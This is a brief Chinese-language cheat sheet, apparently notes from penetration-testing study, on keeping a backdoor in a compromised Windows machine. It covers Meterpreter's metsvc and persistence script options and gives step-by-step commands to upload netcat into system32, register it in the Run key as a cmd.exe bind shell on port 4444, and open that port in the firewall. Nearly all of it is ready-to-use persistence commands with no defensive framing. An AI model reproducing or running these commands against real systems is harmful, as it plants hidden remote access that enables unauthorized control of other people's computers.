Meterpreter后门
Metsvc
无认证,固定31337端口
- -A :自动启动匹配的利用漏洞/多个/处理程序以连接到服务
- -r:卸载现有的MeterMeter服务(必须手动删除文件)
Persistence
通过启动项启动,定期连接,系统启动时回连,自动运行
- -A:自动启动匹配的利用漏洞/多个/处理程序以连接到代理
- -S:作为服务启动时自动启动代理(具有系统权限)
- -U:当用户登录时自动启动代理
- -L:目标主机中要向其写入负载的位置,如果没有,将使用%TEMP%。
- -P:设置payload载荷
- -X:系统引导时自动启动代理
- -i:每次连接尝试之间的间隔(秒)
- -p:设置端口
- -r:设置IP
杀掉session5后等待20秒后重新获得一个session
NC
kali:usr/share/windows-resources/binaries/nc.exe
-
上传nc:upload /usr/share/windows-resources/binaries/nc.exe C:\windows\system32
- 修改注册表
- 枚举注册表键值:reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
- 在主键下添加nc键值:reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘nc.exe -lvp 4444 -e cmd.exe’
- 查看nc键值:reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc
- 设置防火墙:
- 开启一个cmd通道:execute -f cmd -i -H
- 查看防火墙状态:netsh firewall show opmode
- 添加防火墙规则允许4444端口通过:netsh firewall add portopening TCP 4444 “Service Firewall” ENABLE
- 查看端口状态:netsh firewall show portopening
-
连接:nc -v ip port